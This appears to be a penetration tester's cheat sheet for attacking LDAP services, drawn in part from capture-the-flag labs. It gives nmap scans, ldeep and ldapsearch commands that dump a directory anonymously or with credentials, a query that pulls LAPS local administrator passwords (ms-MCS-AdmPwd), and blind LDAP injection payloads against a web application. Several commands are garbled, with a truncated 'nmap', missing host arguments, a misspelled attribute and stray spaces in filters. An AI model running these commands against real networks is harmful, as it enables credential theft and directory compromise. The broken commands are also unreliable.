LDAP - Port 389 or LDAP SSL on Port 636
Nmap Scan
map -n -sV --script "ldap* and not brute" -p389,636,3268,3269
nmap -sC -Pn -p389,636,3268,3269
#DUMP Everything from LDAP - Anonymous
ldeep ldap -a -d STEINS.local -s ldap:// all dump
#Dump as an Authenticated User
ldeep ldap -u Administrator -p 'password' -d steins.local -s ldap:// all dump
Basic LDAP Search Commands
#Get FULL Domain Name and it's contexts
ldapsearch -x -h -s base namingcontexts
ldapsearch -H ldap:// -x -s base namingcontexts
#Dump accessible data from ldap
ldapsearch -x -h forest.htb.local -s sub -b 'DC=HTB,DC=LOCAL' | tee ldap_dump.txt
#Dumping passwords using LDAP:
ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
ldapsearch -x -h -D <<username>> -w <<password>> -b "dc=AJLAB,dc=COM" "(ms-MCS-AdmPwd=*)" ms-MSC-AdmPwd
#Find the Domain Name of the DC
#Find some info or creds
ldapsearch -LLL -x -H ldap://DOMAIN.FQDN.COM -b '' -s base '(objectclass=*)'
JXplorer can be used to acess ldap service
In the url or the response body, see if you can find "objectClass" - then its most probably using ldap
BLIND LDAP Injection - Web Application
# Web App allows us to list all available printers from LDAP without any errors, below search filter is used
if we inject ,,*)(objectless=*))(&(objectClass=void", then the web application will issue the following query:
in that case, only tyhe LDAP query will be processed resulting in (&(objectClass=*)(ObjectClass=*)) being extracted from blank field.
As a result, the printer icon will be shown to the client. As this query always returns results due to objectClass being set to a wildcard. We can construct further true/false statements in the following way :
(&(objectClass=*)(object Class=users))(&object Class=foo)(type=Canon*))(&(objectClass=*)(objectClass=resources))(&object Class=foo)(type=Canon*))
Using such queries, it is possible to enumerate possible object classes based on true/false conditio (printer icon should be shown or not).
Similar logic can be used in case of "OR" blind LDAP injection. Consider the following query with injected part:
#query returns no object, so the printer icon should not be shown to the user.
#Enumerate Directory Structure
(|(objectClass=void)(objectClass=users))(&objectClass=void) (type=Canon*))
(|(objectClass=void)(object Class=resources))(&objectClass=void) (type=Canon*)) # List Local Users accounts
you can find ldap schema's here
# posixaccount Account contains below attributes
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